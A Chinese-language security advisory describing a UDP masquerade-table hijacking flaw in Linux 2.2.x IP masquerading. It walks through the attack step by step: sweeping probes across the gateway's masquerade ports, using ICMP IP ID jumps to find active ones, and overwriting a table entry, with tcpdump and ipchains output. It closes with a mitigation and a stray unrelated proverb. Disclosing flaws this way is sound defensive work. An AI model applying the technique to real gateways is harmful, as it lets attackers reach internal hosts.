2.2.x内核IP伪装存在安全漏洞

　　Linux系统2.2.x内核的IP伪装实现中存在严重安全漏洞。在相关的核心代码中对连接情况缺乏认真的检查。攻击者可以重写核心中UDP伪装表项，使攻击者的UDP包可以被路由进内部机器。 当一个内部IP要访问外部网络的DNS服务器时，当发送的UDP包经过IP伪装网关时，内核会添加一个表项来记录这个连接。比如从内部主机A的1035端口连往外部主机C的53端口的一个UDP包，内核将这个包的源地址替换成伪装网关(B)的IP,源端口设置成网关上为此连接分配的一个端口，缺省是从61000端口到65096端口，因此理论上可以核心同时处理4096个TCP/UDP伪装连接。 Host A:1035 -> GW B:63767 -> Host C:53 当外部网络发送一个UDP包到伪装网关时，Linux IP伪装只根据目标端口来决定是否应该将这个UDP包转发到内部网络。如果目标端口在已经建立的伪装连接表中有对应表项，它就会将此包中的源ip和源端口更新相应表项的远程主机ip和端口。攻击者只要判断伪装网关的的端口就可能用自己的ip和端口来重写伪装连接表。伪装网关用来为伪装连接服务的端口范围通常是从61000到65096,因此外部攻击者很容易判断哪些端口已经被用来建立连接。攻击者可以向伪装网关的这些端口发送UDP检测包，然后检查端口的ICMP应答包的IP ID。每个主机每发一个包，它的TCP/IP栈中的IP ID会递增一。因此对于用于ip伪装的端口所发会的ICMP应答中将会有内部主机的IP ID. 这个ID通常会与网关主机的当前IP ID相差很多，通常都在1000以上。下面的例子就显示了利用弱点进行攻击的过程： 主机 A 是内部主机 (192.168.1.100) 主机 B 是伪装网关 (192.168.1.1 / 10.0.0.1) 主机 C 是一台外部DNS服务器 (10.0.0.25) 主机 X 是外部攻击者的IP (10.10.187.13) 进行检测之前，在伪装网关上执行命令：ipchains -L -M -n 来显示当前伪装连接表的情况： > UDP 03:39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53 目前是从192.168.1.100的1035端口发往10.0.0.25的53端口的连接，伪装端口是63767 [ 从攻击者的机器上进行tcpdump得到的结果] (为了更容易的看清楚问题，这里我们设置所有检测用的包的源端口为12345 ) [ 我们的检测将从61000端口开始，我们略掉了前面的一些结果 ] 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135) 10.10.187.13.12345 > 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, id 23069) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136) 10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id 23070) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137) 10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id 23071) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138) 10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id 23074) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139) 10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id 23083) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos 0xd8] (ttl 244, id 17205) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 上面这个包的ID是17205,它与13139相差已经超过4000了，这就是说，我们发现了一个经过伪装的连接。!!! 10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140) 10.10.187.13.12345 > 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141) 10.10.187.13.12345 > 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id 13142) 10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143) 10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23092) 10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144) [ 我们的检测到65096端口结束，我们省略了一些结果 ] 现在我们再来检查一下伪装网关的伪装连接表的情况： ipchains -L -M -n > UDP 04:35.12 192.168.1.100 10.10.187.13 1035 (63767) -> 12345 可以看到，现在远程主机已经换成了攻击者的ip:10.10.187.13,目标端口也换成了攻击者检测用的源端口:12345 现在攻击者就可以从12345源端口发送UDP数据给内部主机的1035端口了。 ——————————————————————————– 建议: 对于访问外部DNS的问题，一个可能的解决办法是在伪装网关上设置一个缓存域名服务器，然后禁止UDP包的伪装。 ，有山就有路，有河就能渡。